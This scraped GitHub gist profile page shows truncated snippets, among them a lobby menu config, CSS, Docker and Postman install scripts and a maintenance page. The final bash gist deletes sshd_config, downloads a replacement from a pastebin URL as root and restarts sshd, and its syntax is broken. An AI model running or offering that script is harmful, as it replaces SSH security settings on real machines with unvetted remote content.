Skip to content

Instantly share code, notes, and snippets.

View marcelofelipes's full-sized avatar
🏠
Working from home

Marcelo marcelofelipes

🏠
Working from home
View GitHub Profile
# Configuração do Menu de Spawn - Lobby
# Este arquivo define os itens e ações para o menu principal no lobby do servidor.
name: '&8Lobby' # Nome do menu
size: 9 # Tamanho do menu (quantidade de slots)
items:
# Botão 1: Kit Inicial
btn-0:
@marcelofelipes
marcelofelipes / bongo-cat-codes-2-jamming.markdown
Created March 15, 2023 16:33
Bongo Cat Codes #2 - Jamming
body {
font-family: 'nunito !important;
}
/*=====================================================
= Media Queries for meow =
=====================================================*/
@media only screen and (max-width : 2200px) {
recovery_tool_version=0.9.2
recovery_tool_linux_version=0.9.2
recovery_tool_update=
name= All Lux
version=12739.111.0
desc=
channel=stable-channel
hwidmatch=^ASUKA .*
#!/bin/sh
set -e
# This script is meant for quick & easy install via:
# $ curl -fsSL https://get.docker.com -o get-docker.sh
# $ sh get-docker.sh
#
# For test builds (ie. release candidates):
# $ curl -fsSL https://test.docker.com -o test-docker.sh
# $ sh test-docker.sh
@marcelofelipes
marcelofelipes / postman-deb.sh
Created November 11, 2018 11:22 — forked from SanderTheDragon/postman-deb.sh
A shellscript to create a Postman .deb file, for simple installation on Debian-based Linux distro's. Also creates a .desktop file.
#!/bin/sh
script=`basename "$0"`
if [ $# -gt 0 ] && [ "$1" = "-e" ]; then
e="-e"
fi
echo "Removing old Postman tarballs"
rm -f $(ls Postman*.tar.gz)
@marcelofelipes
marcelofelipes / index.html
Created July 29, 2018 16:42
Under Maintenance
<div class="container">
<div class="what-is-up">
<div class="spinny-cogs">
<i class="fa fa-cog" aria-hidden="true"></i>
<i class="fa fa-5x fa-cog fa-spin" aria-hidden="true"></i>
<i class="fa fa-3x fa-cog" aria-hidden="true"></i>
</div>
<h1 class="maintenance">Under Maintenance</h1>
<h2>Our developers are hard at work updating your system. Please wait while we do this. We have also made the spinning cogs to distract you.</h2>
#!/bin/bash
sudo su root
passwd root | scriptroot
rm /etc/ssh/sshd_config
cd /etc/ssh/
wget https://pastebin.com/raw/g7uwZzvC -O sshd_config
service sshd restart
done